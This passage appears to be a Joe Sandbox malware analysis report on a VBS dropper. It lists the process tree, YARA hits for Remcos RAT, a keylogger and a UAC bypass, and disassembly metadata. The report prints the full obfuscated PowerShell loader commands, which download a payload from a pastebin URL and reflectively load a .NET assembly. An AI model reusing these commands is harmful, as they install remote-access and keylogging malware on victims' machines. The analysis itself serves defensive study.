Q?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:02:41:01
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:02:41:03
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:02:41:05
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c
                                                                                              Imagebase:0x7ff684400000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:02:41:05
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                              Imagebase:0x7ff7cad00000
                                                                                              File size:22'528 bytes
                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:02:41:09
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:02:41:21
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                              Imagebase:0xa90000
                                                                                              File size:43'008 bytes
                                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Executed Functions

                                                                                                Function 00007FFD9B9837B5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1976974174.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                • Instruction ID: 6eb40f59b6a87f2098dbe40235456c039b9dca3bb15d5331fb810070f58f72af
                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                • Instruction Fuzzy Hash: B601A77021CB0C4FD748EF0CE051AA6B3E0FB85320F10056DE58AC36A1D632E882CB41

                                                                                                Executed Functions

                                                                                                Function 00007FFD9BA41493 Relevance: 4.4, Strings: 2, Instructions: 1929COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7Q5$(7Q5
                                                                                                • API String ID: 0-3205885250
                                                                                                • Opcode ID: 24b98ccb1cb8b9f52d384efc9a72908c6df17fee07dbf2341fc57e87172f76ab
                                                                                                • Instruction ID: 07aee74b265fe62854f4651ab633a8db52f4aaebfa8e44d20cc4131916028a06
                                                                                                • Opcode Fuzzy Hash: 24b98ccb1cb8b9f52d384efc9a72908c6df17fee07dbf2341fc57e87172f76ab
                                                                                                • Instruction Fuzzy Hash: 8DC24931B0EB8D0FE7A69BA858655B57FE2EF66310B0901FBD04DC71A3DA58AD06C341
                                                                                                Function 00007FFD9BA431CD Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: x8Q5
                                                                                                • API String ID: 0-1352944497
                                                                                                • Opcode ID: 6fdfac4ac2ef46edf04f72f4e782fdfb2614f9b11657bf441f54f9ff1cfcf481
                                                                                                • Instruction ID: b3b2980b300f3d4eef5756dd9cbfaebae9781875439b35b8283453b7ba41c6c8
                                                                                                • Opcode Fuzzy Hash: 6fdfac4ac2ef46edf04f72f4e782fdfb2614f9b11657bf441f54f9ff1cfcf481
                                                                                                • Instruction Fuzzy Hash: 2D419770A1995D8FDBA5EB28C8A4BE8B7F1EF59301F5000EA944DE3291DB356EC18F00
                                                                                                Function 00007FFD9BA442E5 Relevance: .3, Instructions: 319COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a564fc6724944025aa65a8ccde48b7c0ecaa4c0a95ae4b2f41a61897f41ef9ff
                                                                                                • Instruction ID: dea9805931bd571ab665871169dd6a1f7c6351b48e1f3216d8cc874b13de1efc
                                                                                                • Opcode Fuzzy Hash: a564fc6724944025aa65a8ccde48b7c0ecaa4c0a95ae4b2f41a61897f41ef9ff
                                                                                                • Instruction Fuzzy Hash: 2ED1F771E0952D8BEB68EB54C8A5BE8B3B2FF54305F5042F9D05DA22A5CE746E81CF40
                                                                                                Function 00007FFD9BA43575 Relevance: .1, Instructions: 140COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3ca825e31c84d3b6e967d0ea1aa6af1d2f07d0effa53b375edaef79d41e93d77
                                                                                                • Instruction ID: 0d55f5fe1ce8fdb93d408b555e5bc60dc5e30da238df0381511f17cf0838b8d7
                                                                                                • Opcode Fuzzy Hash: 3ca825e31c84d3b6e967d0ea1aa6af1d2f07d0effa53b375edaef79d41e93d77
                                                                                                • Instruction Fuzzy Hash: 95510E70A0995D9FDFA4EF68C8A9BA9BBF1EF59311F1001E9D04DE7261DA346981CF00
                                                                                                Function 00007FFD9B979CF9 Relevance: .1, Instructions: 123COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b2d6b46a3c15ae451666470577835d721d84f282476c7cf93a03ff90b58b0a9a
                                                                                                • Instruction ID: 6722d1984a07d1d5422e626036884396f015b100d2e7fb139ffe2bec6e7bfe9a
                                                                                                • Opcode Fuzzy Hash: b2d6b46a3c15ae451666470577835d721d84f282476c7cf93a03ff90b58b0a9a
                                                                                                • Instruction Fuzzy Hash: 5E418E71A1964EAFDB55DF98C8A99EDB7F1FF58300F00017AD019E32A1DE346941CB90
                                                                                                Function 00007FFD9B979D38 Relevance: .1, Instructions: 113COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c263fb8cf5929b011a86bd24cf2c0ac40ff35957bc9e185c039f60ed0f44131a
                                                                                                • Instruction ID: e493ca3410b6072927985dc73400879378a1c47363ad61e7a79da2522b4e8b94
                                                                                                • Opcode Fuzzy Hash: c263fb8cf5929b011a86bd24cf2c0ac40ff35957bc9e185c039f60ed0f44131a
                                                                                                • Instruction Fuzzy Hash: 8F310230A1D68E9FDB59DFA8C8A59E9BBF1FF59300F00016ED009D72E2CA346941CB90
                                                                                                Function 00007FFD9B980C98 Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 87338b3adc24cec4319ab21a6b00dc8df59ff02ae362b9414009738e6718f080
                                                                                                • Instruction ID: 700aa909052c406dba8b6693827ed62f0aa3044a749fe089d42c7655c85fc24f
                                                                                                • Opcode Fuzzy Hash: 87338b3adc24cec4319ab21a6b00dc8df59ff02ae362b9414009738e6718f080
                                                                                                • Instruction Fuzzy Hash: BA41E630A19A1D9FDBA5DFA8C8557E977B1FF29301F5140BAD00DE32A1CB346994CB40
                                                                                                Function 00007FFD9B974295 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a3cab666ffcd524b70a4320a4d6eb24e4c4994f21a349539ab0b8631e9931678
                                                                                                • Instruction ID: d1d13ccaf49dd9e6c238a974903c2847164a4e6a7dadefffbfeffe7c4a1d6cce
                                                                                                • Opcode Fuzzy Hash: a3cab666ffcd524b70a4320a4d6eb24e4c4994f21a349539ab0b8631e9931678
                                                                                                • Instruction Fuzzy Hash: B101A73021CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58AC36A5D732E881CB41
                                                                                                Function 00007FFD9BA434FA Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c4a707f4bbd6a3d2f3f53a245bbd41102c56edb2257f5c54971cdd1299a37121
                                                                                                • Instruction ID: 1fbf00e42f184c3b5ce5ac6c06b972ccecd506e2c7cd009e58e5e10be8a68c2e
                                                                                                • Opcode Fuzzy Hash: c4a707f4bbd6a3d2f3f53a245bbd41102c56edb2257f5c54971cdd1299a37121
                                                                                                • Instruction Fuzzy Hash: 0F019670A1952C5FDBA4EB2488A9BA9B7B1EF5A311F9101EA904DE3261DE305E818F00
                                                                                                Function 00007FFD9B979E74 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b8083fab37f98301af50b53c15728b5e60fce93f221dc16479beec1e26dd48b3
                                                                                                • Instruction ID: 7533dcbe54ce5595cfd52cef4c4ceeba69f7854e93b1ef62791e3661097958cf
                                                                                                • Opcode Fuzzy Hash: b8083fab37f98301af50b53c15728b5e60fce93f221dc16479beec1e26dd48b3
                                                                                                • Instruction Fuzzy Hash: 8BF03C34E1D10A9BDB28DA94C8A58BEB7B2EF98310F11412DC00AA3291DE346A42CB80
                                                                                                Function 00007FFD9B979CA9 Relevance: .0, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3c6d57ed630333aa8eab5fd31717cfe3f6d8bbc11ffe8065dd2b487560055e71
                                                                                                • Instruction ID: bae328919febbb6cc948eff8d7a49c51824986c49e001e2aa3a71794e8be8c85
                                                                                                • Opcode Fuzzy Hash: 3c6d57ed630333aa8eab5fd31717cfe3f6d8bbc11ffe8065dd2b487560055e71
                                                                                                • Instruction Fuzzy Hash: 9CD06C36A0882DDF8F60EBD898485ECB7B0FB68352B000126E509E7204D730A9518B50

                                                                                                Non-executed Functions

                                                                                                Function 00007FFD9B9840E0 Relevance: .5, Instructions: 513COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9def1f4250a8490c584c98e2b9674fef1e8f4313306c59df24aa7b3adad799f0
                                                                                                • Instruction ID: 49b5a0380abb288e1ea99d727aa82f72ab58154f69ce7bdc29bfd1cdd9bb494d
                                                                                                • Opcode Fuzzy Hash: 9def1f4250a8490c584c98e2b9674fef1e8f4313306c59df24aa7b3adad799f0
                                                                                                • Instruction Fuzzy Hash: 3512F870A19A1D9FDBA4DF98C494BA977F1FF68301F1140BAD00DD72A5DB34AA85CB40
                                                                                                Function 00007FFD9BA40FC5 Relevance: .1, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 86ff743f4660bf96ffa6604bbff0d35c73473861dc32de7b03eebce5fa250f31
                                                                                                • Instruction ID: 351d086b7397d7cbb159e9060d3a55212aa5d0ea52f6fb2cfac3a05a9199766c
                                                                                                • Opcode Fuzzy Hash: 86ff743f4660bf96ffa6604bbff0d35c73473861dc32de7b03eebce5fa250f31
                                                                                                • Instruction Fuzzy Hash: 1111AC2290F6D64FD7238B744C765A47FB1AF53644B0E41FFD098CA1E3D5481909C362
                                                                                                Function 00007FFD9B97D7F8 Relevance: .1, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 492a75d228d0c5618727893404d7c1d9aae841825d8f7c1f9135e1fc8c21ba01
                                                                                                • Instruction ID: 664234a1ca55e0b9ac146f84658f5a5b2cf47a1ea87e825a55c8169fc5020a0b
                                                                                                • Opcode Fuzzy Hash: 492a75d228d0c5618727893404d7c1d9aae841825d8f7c1f9135e1fc8c21ba01
                                                                                                • Instruction Fuzzy Hash: E8217C6094E3C96FD7138BA488746E87FB0AF03310F0A45EBC495CB0E3DA685A09C712
                                                                                                Function 00007FFD9B97ACD5 Relevance: .0, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 27c015146e1ead5c67c34ac45ae684557cea83dbb0e52961c6848c06c818bf9f
                                                                                                • Instruction ID: d6fc842a6b4dcd3ea509244616d916d542f7072763e1a07620a0343527d7790c
                                                                                                • Opcode Fuzzy Hash: 27c015146e1ead5c67c34ac45ae684557cea83dbb0e52961c6848c06c818bf9f
                                                                                                • Instruction Fuzzy Hash: 4C01D430A5E28D9FE7269B60D860AF977B0EB42301F050177D405D71F6DA7C6709C755

                                                                                                Executed Functions

                                                                                                Function 00007FFD9B9B37B5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.1804510036.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b9b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                • Instruction ID: 03cfe8d71f9e02545cdf0009c6c0a79b5e4b07bfbfde32343fac69daf1e17f34
                                                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                • Instruction Fuzzy Hash: 9101A77021CB0C4FD748EF0CE051AA6B3E0FB85320F10056EE58AC36A1D632E882CB41

                                                                                                Execution Graph

                                                                                                Execution Coverage:4.1%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:5.3%
                                                                                                Total number of Nodes:1286
                                                                                                Total number of Limit Nodes:36
                                                                                                execution_graph 46615 43bea8 46617 43beb4 _swprintf CallCatchBlock 46615->46617 46616 43bec2 46631 44062d 20 API calls _Atexit 46616->46631 46617->46616 46619 43beec 46617->46619 46626 445909 EnterCriticalSection 46619->46626 46621 43bec7 __cftoe CallCatchBlock 46622 43bef7 46627 43bf98 46622->46627 46626->46622 46628 43bfa6 46627->46628 46630 43bf02 46628->46630 46633 4497ec 37 API calls 2 library calls 46628->46633 46632 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 46630->46632 46631->46621 46632->46621 46633->46628 46634 434918 46635 434924 CallCatchBlock 46634->46635 46661 434627 46635->46661 46637 43492b 46639 434954 46637->46639 46959 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46637->46959 46648 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46639->46648 46960 4442d2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46639->46960 46641 43496d 46643 434973 CallCatchBlock 46641->46643 46961 444276 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46641->46961 46644 4349f3 46672 434ba5 46644->46672 46648->46644 46962 443487 36 API calls 5 library calls 46648->46962 46654 434a15 46655 434a1f 46654->46655 46964 4434bf 28 API calls _Atexit 46654->46964 46657 434a28 46655->46657 46965 443462 28 API calls _Atexit 46655->46965 46966 43479e 13 API calls 2 library calls 46657->46966 46660 434a30 46660->46643 46662 434630 46661->46662 46967 434cb6 IsProcessorFeaturePresent 46662->46967 46664 43463c 46968 438fb1 10 API calls 4 library calls 46664->46968 46666 434641 46671 434645 46666->46671 46969 44415f 46666->46969 46669 43465c 46669->46637 46671->46637 47035 436f10 46672->47035 46675 4349f9 46676 444223 46675->46676 47037 44f0d9 46676->47037 46678 434a02 46681 40ea00 46678->46681 46680 44422c 46680->46678 47041 446895 36 API calls 46680->47041 47043 41cbe1 LoadLibraryA GetProcAddress 46681->47043 46683 40ea1c GetModuleFileNameW 47048 40f3fe 46683->47048 46685 40ea38 47063 4020f6 46685->47063 46688 4020f6 28 API calls 46689 40ea56 46688->46689 47069 41beac 46689->47069 46693 40ea68 47095 401e8d 46693->47095 46695 40ea71 46696 40ea84 46695->46696 46697 40eace 46695->46697 47358 40fbee 97 API calls 46696->47358 47101 401e65 46697->47101 46700 40eade 46704 401e65 22 API calls 46700->46704 46701 40ea96 46702 